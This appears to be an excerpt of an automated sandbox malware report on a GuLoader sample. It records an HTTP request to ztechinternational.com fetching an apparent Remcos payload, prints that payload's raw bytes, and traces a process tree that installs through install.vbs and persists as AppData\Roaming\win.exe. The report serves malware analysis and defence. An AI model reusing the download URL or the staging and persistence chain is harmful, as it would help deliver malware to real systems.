            Data Raw: b0 8d ab 08 57 8e 61 a7 eb fe 2b 2b 06 b8 da 62 ed 86 b7 cb 09 e0 c1 d9 23 4e 2a 90 8e 19 c3 4f b3 a9 65 45 5e 99 bd 65 16 b3 e2 e5 9a 0a 6a 91 27 49 c4 22 07 be b6 97 d1 46 de 76 8f 6c d7 30 cb db 1a 49 82 a3 a0 55 f9 d4 01 88 ef da af cc 85 6e 84 a1 db d1 10 b6 55 cb 2a ea bd 43 0a c8 71 46 42 5e 0b 15 0c 30 8d 7e d5 80 be 90 f3 c5 78 3f 87 6d 9a 9f 00 d1 98 9c a1 1f 59 68 15 6d 0d fd bf 44 b3 73 04 a0 9c 6f 2b f9 f5 66 57 02 b2 46 e8 3e 7f af 59 fe 21 89 70 94 9b 6c 3d 9f 3d 1c a0 15 40 34 53 93 10 88 26 bb eb c2 44 c5 23 e9 41 a6 59 3e dc 09 e6 a4 63 fc 44 c9 56 37 65 b6 b1 2a 03 b3 6c 60 62 10 d6 33 03 4f 95 53 3a c2 37 98 96 74 c8 94 09 09 78 e6 26 ca b9 76 15 1d ee 17 ba 70 14 4c db ce 47 43 cc 8d 7e 25 2b ea 7b 46 1f e3 2e 46 4b aa 04 b1 34 14 16 54 84 a9 3d 56 8d c7 18 59 8e b8 99 33 a8 b9 21 36 c5 0e 31 01 51 96 78 4b d3 da 0d c2 f0 49 60 62 11 32 3d f1 94 40 6e 6e 78 3e fd 20 06 3e 66 79 25 29 16 7b 28 40 55 7b 2b 1a d9 28 4e 1d 7d ce 8d 4f 34 86 77 e4 9a bd 6c 22 fc a6 eb 98 20 d8 1f 49 ce 91 e4 72 00 c7 52 36 9e 79 bc cf a0 d8 98 9a 1d 93 1a bc a8 f1 53 b3 bb 5e d8 e6 e6 03 09 05 97 f2 2b 16 e7 81 22 61 73 ec 32 81 65 97 67 c4 3f f6 74 05 e4 4d c7 b4 11 79 f8 83 29 3a 59 99 ee 2b ff 40 1c 5f e1 e6 0e 28 08 e3 9a 93 c1 e7 6f 07 50 ab 33 20 6f da c7 ef 9b 4d 22 8a 1c e3 23 ad 9a ee d7 ec 42 8b ca c5 73 4b b1 a3 fe 3a 61 a9 a7 4f f2 7f a7 22 24 65 2a 63 85 71 be 6f 2f a0 6d b1 37 69 19 c6 bc 34 51 c3 71 d0 a3 c5 67 2f e5 8b 82 54 cc cc 97 99 c4 70 91 71 85 54 8c a8 10 58 9c 57 13 1d bf 34 38 2a 88 27 97 72 e6 fa 4d bc 07 5c ff c5 ec b6 73 9f d2 d9 a5 9c 31 d1 17 6a a2 dc cc 64 92 6e 47 a4 aa 17 4e b2 9c 7e 02 6c c4 fa db ec 6f f7 b5 b3 1d 92 eb 12 66 3f e0 b0 11 15 00 c3 78 bd 3b c5 25 6a 26 d7 ec b9 22 cd 6d 99 0a 33 b0 1e 47 45 42 40 b6 c5 7f f3 6e e1 69 2a a8 e5 70 cf 04 0d 71 56 82 91 88 b1 a6 43 17 f8 54 eb 78 dd 81 71 ce 9d 45 8c c9 5e 20 6c 9e 33 eb 13 78 18 80 58 66 79 ab ae 36 ca 33 06 14 c7 3a e7 b0 c5 73 f2 ab 02 da 42 a1 42 df 57 00 2c 4f da cf 05 24 30 70 63 d6 d2 c5 90 69 47 92 b2 ba 97 ac cf f2 93 d1 8d f9 c6 58 8f 55 8c 1a ef 2e 90 25 cc b2 77 55 a3 ef b3 21 c9 88 cb f6 5c 4a 21 47 e0 f4 7c 2e 5e fc 27 2f 2d ec 9c 69 f7 80 ad 20 19 8c 98 a6 34 ac 57 4c 0d e7 69 3b b8 36 d6 24 58 4b ee cb 1d 12 59 68 2c 50 dd 1b e5 de cb 60 41 11 57 2c 19 bc c0 37 10 9c 7a 11 26 0a f2 08 3b d4 84 4c 2d 95 40 2f 53 ab 1f 79 f5 23 a7 58 f3 3d 20 3a f9 0a e4 1b ab ca 43 1c 0e 7b d9 4d 10 f6 3e d3 53 6a 68 dd 69 4a bb f2 29 0c 30 86 52 eb 7c 44 65 90 8b 60 93 90 c1 07 57 b8 f0 1c f0 d1 31 2e 7a 26 a2 79 39 ea 8c 5e 68 fa 4c dd 93 b6 86 81 8a 49 81 a3 a0 55 fd d4 01 88 10 25 af cc 3d 6e 84 a1 db d1 10 b6 15 cb 2a ea bd 43 0a c8 71 46 42 5e 0b 15 0c 30 8d 7e d5 80 be 90 f3 c5 78 3f 87 6d 9a 9f 00 d1 98 9c a1 1f a1 68 15 6d 03 e2 05 4a b3 c7 0d 6d bd d7 2a b5 38 47 03 6a db 35 c8 4e 0d c0 3e 8c 40 e4 50 f7 fa 02 53 f0 49 3c c2 70 60 46 26 fd 30 e1 48 9b af 8d 17 e5 4e 86 25 c3 77 33 d1 03 c2 a4 63 fc 44 c9 56 37 01 ca 36 93 23 ae 85 8a 42 0d 3f d9 23 52 7c b9 57 fc c3 72 b7 69 21 7e 7a 37 88 0c 04 d7 50 9c 35 00 07 fd 95 6d fd a6 80 cf a2 a9 ed 90 97 cf 88 eb 9c ac 3b fe c7 ac 83 a8 e7 5b 1f 09 ff be 4c ab d0 bc a9 da f1 b3 cc ba 63 d9 87 a4 c8 dc e5 13 d9 eb 3e 8a 91 a1 4b c1 e2 28 d1 54 89 88 d9 30 df 1b aa 5d 87 84 2a 57 9e
            Data Ascii: Wa++b#N*OeE^ej'I"Fvl0IUnU*CqFB^0~x?mYhmDso+fWF>Y!pl==@4S&D#AY>cDV7e*l`b3OS:7tx&vpLGC~%+{F.FK4T=VY3!61QxKI`b2=@nnx> >fy%){(@U{+(N}O4wl" IrR6yS^+"as2eg?tMy):Y+@_(oP3 oM"#BsK:aO"$e*cqo/m7i4Qqg/TpqTXW48*'rM\s1jdnGN~lof?x;%j&"m3GEB@ni*pqVCTxqE^ l3xXfy63:sBBW,O$0pciGXU.%wU!\J!G|.^'/-i 4WLi;6$XKYh,P`AW,7z&;L-@/Sy#X= :C{M>SjhiJ)0R|De`W1.z&y9^hLIU%=n*CqFB^0~x?mhmJm*8Gj5N>@PSI<p`F&0HN%w3cDV76#B?#R|Wri!~z7P5m;[Lc>K(T0]*W


            Session IDSource IPSource PortDestination IPDestination PortProcess
            3192.168.2.549723192.185.113.21980C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            TimestampkBytes transferredDirectionData
            Jun 7, 2021 20:42:05.084418058 CEST1823OUTGET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: ztechinternational.com
            Cache-Control: no-cache
            Jun 7, 2021 20:42:05.270745039 CEST1825INHTTP/1.1 200 OK
            Date: Mon, 07 Jun 2021 18:42:05 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade
            Last-Modified: Sun, 06 Jun 2021 21:56:54 GMT
            Accept-Ranges: bytes
            Content-Length: 131136
            Content-Type: application/octet-stream
            Data Raw: b0 8d ab 08 57 8e 61 a7 eb fe 2b 2b 06 b8 da 62 ed 86 b7 cb 09 e0 c1 d9 23 4e 2a 90 8e 19 c3 4f b3 a9 65 45 5e 99 bd 65 16 b3 e2 e5 9a 0a 6a 91 27 49 c4 22 07 be b6 97 d1 46 de 76 8f 6c d7 30 cb db 1a 49 82 a3 a0 55 f9 d4 01 88 ef da af cc 85 6e 84 a1 db d1 10 b6 55 cb 2a ea bd 43 0a c8 71 46 42 5e 0b 15 0c 30 8d 7e d5 80 be 90 f3 c5 78 3f 87 6d 9a 9f 00 d1 98 9c a1 1f 59 68 15 6d 0d fd bf 44 b3 73 04 a0 9c 6f 2b f9 f5 66 57 02 b2 46 e8 3e 7f af 59 fe 21 89 70 94 9b 6c 3d 9f 3d 1c a0 15 40 34 53 93 10 88 26 bb eb c2 44 c5 23 e9 41 a6 59 3e dc 09 e6 a4 63 fc 44 c9 56 37 65 b6 b1 2a 03 b3 6c 60 62 10 d6 33 03 4f 95 53 3a c2 37 98 96 74 c8 94 09 09 78 e6 26 ca b9 76 15 1d ee 17 ba 70 14 4c db ce 47 43 cc 8d 7e 25 2b ea 7b 46 1f e3 2e 46 4b aa 04 b1 34 14 16 54 84 a9 3d 56 8d c7 18 59 8e b8 99 33 a8 b9 21 36 c5 0e 31 01 51 96 78 4b d3 da 0d c2 f0 49 60 62 11 32 3d f1 94 40 6e 6e 78 3e fd 20 06 3e 66 79 25 29 16 7b 28 40 55 7b 2b 1a d9 28 4e 1d 7d ce 8d 4f 34 86 77 e4 9a bd 6c 22 fc a6 eb 98 20 d8 1f 49 ce 91 e4 72 00 c7 52 36 9e 79 bc cf a0 d8 98 9a 1d 93 1a bc a8 f1 53 b3 bb 5e d8 e6 e6 03 09 05 97 f2 2b 16 e7 81 22 61 73 ec 32 81 65 97 67 c4 3f f6 74 05 e4 4d c7 b4 11 79 f8 83 29 3a 59 99 ee 2b ff 40 1c 5f e1 e6 0e 28 08 e3 9a 93 c1 e7 6f 07 50 ab 33 20 6f da c7 ef 9b 4d 22 8a 1c e3 23 ad 9a ee d7 ec 42 8b ca c5 73 4b b1 a3 fe 3a 61 a9 a7 4f f2 7f a7 22 24 65 2a 63 85 71 be 6f 2f a0 6d b1 37 69 19 c6 bc 34 51 c3 71 d0 a3 c5 67 2f e5 8b 82 54 cc cc 97 99 c4 70 91 71 85 54 8c a8 10 58 9c 57 13 1d bf 34 38 2a 88 27 97 72 e6 fa 4d bc 07 5c ff c5 ec b6 73 9f d2 d9 a5 9c 31 d1 17 6a a2 dc cc 64 92 6e 47 a4 aa 17 4e b2 9c 7e 02 6c c4 fa db ec 6f f7 b5 b3 1d 92 eb 12 66 3f e0 b0 11 15 00 c3 78 bd 3b c5 25 6a 26 d7 ec b9 22 cd 6d 99 0a 33 b0 1e 47 45 42 40 b6 c5 7f f3 6e e1 69 2a a8 e5 70 cf 04 0d 71 56 82 91 88 b1 a6 43 17 f8 54 eb 78 dd 81 71 ce 9d 45 8c c9 5e 20 6c 9e 33 eb 13 78 18 80 58 66 79 ab ae 36 ca 33 06 14 c7 3a e7 b0 c5 73 f2 ab 02 da 42 a1 42 df 57 00 2c 4f da cf 05 24 30 70 63 d6 d2 c5 90 69 47 92 b2 ba 97 ac cf f2 93 d1 8d f9 c6 58 8f 55 8c 1a ef 2e 90 25 cc b2 77 55 a3 ef b3 21 c9 88 cb f6 5c 4a 21 47 e0 f4 7c 2e 5e fc 27 2f 2d ec 9c 69 f7 80 ad 20 19 8c 98 a6 34 ac 57 4c 0d e7 69 3b b8 36 d6 24 58 4b ee cb 1d 12 59 68 2c 50 dd 1b e5 de cb 60 41 11 57 2c 19 bc c0 37 10 9c 7a 11 26 0a f2 08 3b d4 84 4c 2d 95 40 2f 53 ab 1f 79 f5 23 a7 58 f3 3d 20 3a f9 0a e4 1b ab ca 43 1c 0e 7b d9 4d 10 f6 3e d3 53 6a 68 dd 69 4a bb f2 29 0c 30 86 52 eb 7c 44 65 90 8b 60 93 90 c1 07 57 b8 f0 1c f0 d1 31 2e 7a 26 a2 79 39 ea 8c 5e 68 fa 4c dd 93 b6 86 81 8a 49 81 a3 a0 55 fd d4 01 88 10 25 af cc 3d 6e 84 a1 db d1 10 b6 15 cb 2a ea bd 43 0a c8 71 46 42 5e 0b 15 0c 30 8d 7e d5 80 be 90 f3 c5 78 3f 87 6d 9a 9f 00 d1 98 9c a1 1f a1 68 15 6d 03 e2 05 4a b3 c7 0d 6d bd d7 2a b5 38 47 03 6a db 35 c8 4e 0d c0 3e 8c 40 e4 50 f7 fa 02 53 f0 49 3c c2 70 60 46 26 fd 30 e1 48 9b af 8d 17 e5 4e 86 25 c3 77 33 d1 03 c2 a4 63 fc 44 c9 56 37 01 ca 36 93 23 ae 85 8a 42 0d 3f d9 23 52 7c b9 57 fc c3 72 b7 69 21 7e 7a 37 88 0c 04 d7 50 9c 35 00 07 fd 95 6d fd a6 80 cf a2 a9 ed 90 97 cf 88 eb 9c ac 3b fe c7 ac 83 a8 e7 5b 1f 09 ff be 4c ab d0 bc a9 da f1 b3 cc ba 63 d9 87 a4 c8 dc e5 13 d9 eb 3e 8a 91 a1 4b c1 e2 28 d1 54 89 88 d9 30 df 1b aa 5d 87 84 2a 57 9e
            Data Ascii: Wa++b#N*OeE^ej'I"Fvl0IUnU*CqFB^0~x?mYhmDso+fWF>Y!pl==@4S&D#AY>cDV7e*l`b3OS:7tx&vpLGC~%+{F.FK4T=VY3!61QxKI`b2=@nnx> >fy%){(@U{+(N}O4wl" IrR6yS^+"as2eg?tMy):Y+@_(oP3 oM"#BsK:aO"$e*cqo/m7i4Qqg/TpqTXW48*'rM\s1jdnGN~lof?x;%j&"m3GEB@ni*pqVCTxqE^ l3xXfy63:sBBW,O$0pciGXU.%wU!\J!G|.^'/-i 4WLi;6$XKYh,P`AW,7z&;L-@/Sy#X= :C{M>SjhiJ)0R|De`W1.z&y9^hLIU%=n*CqFB^0~x?mhmJm*8Gj5N>@PSI<p`F&0HN%w3cDV76#B?#R|Wri!~z7P5m;[Lc>K(T0]*W


            Code Manipulations

            Statistics

            Behavior

            Click to jump to process

            System Behavior

            General

            Start time:20:39:23
            Start date:07/06/2021
            Path:C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe'
            Imagebase:0x400000
            File size:110592 bytes
            MD5 hash:6AA873EE68B60704E3D00F5C885A90F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Visual Basic
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.287917619.00000000020A0000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:20:39:48
            Start date:07/06/2021
            Path:C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe'
            Imagebase:0x400000
            File size:110592 bytes
            MD5 hash:6AA873EE68B60704E3D00F5C885A90F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.287506520.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.350385300.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:20:40:18
            Start date:07/06/2021
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Imagebase:0xac0000
            File size:147456 bytes
            MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:20:40:20
            Start date:07/06/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
            Imagebase:0x140000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:20:40:21
            Start date:07/06/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7ecfc0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:20:40:21
            Start date:07/06/2021
            Path:C:\Users\user\AppData\Roaming\win.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\win.exe
            Imagebase:0x400000
            File size:110592 bytes
            MD5 hash:6AA873EE68B60704E3D00F5C885A90F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Visual Basic
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.481233554.00000000021F0000.00000040.00000001.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 13%, ReversingLabs
            Reputation:low

            General

            Start time:20:40:28
            Start date:07/06/2021
            Path:C:\Users\user\AppData\Roaming\win.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\win.exe'
            Imagebase:0x400000
            File size:110592 bytes
            MD5 hash:6AA873EE68B60704E3D00F5C885A90F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Visual Basic
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000002.540773096.0000000002B40000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:20:40:37
            Start date:07/06/2021
            Path:C:\Users\user\AppData\Roaming\win.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\win.exe'
            Imagebase:0x400000
            File size:110592 bytes
            MD5 hash:6AA873EE68B60704E3D00F5C885A90F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Visual Basic
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000002.481658634.00000000020A0000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:20:40:54
            Start date:07/06/2021
            Path:C:\Users\user\AppData\Roaming\win.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\win.exe
            Imagebase:0x400000
            File size:110592 bytes
            MD5 hash:6AA873EE68B60704E3D00F5C885A90F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000000.436722263.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:20:41:01
            Start date:07/06/2021
            Path:C:\Users\user\AppData\Roaming\win.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\win.exe'
            Imagebase:0x400000
            File size:110592 bytes
            MD5 hash:6AA873EE68B60704E3D00F5C885A90F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.544208632.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000000.444587514.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:20:41:17
            Start date:07/06/2021
            Path:C:\Users\user\AppData\Roaming\win.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\win.exe'
            Imagebase:0x400000
            File size:110592 bytes
            MD5 hash:6AA873EE68B60704E3D00F5C885A90F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.581406039.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000000.481116593.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            Disassembly

            Code Analysis

            Reset < >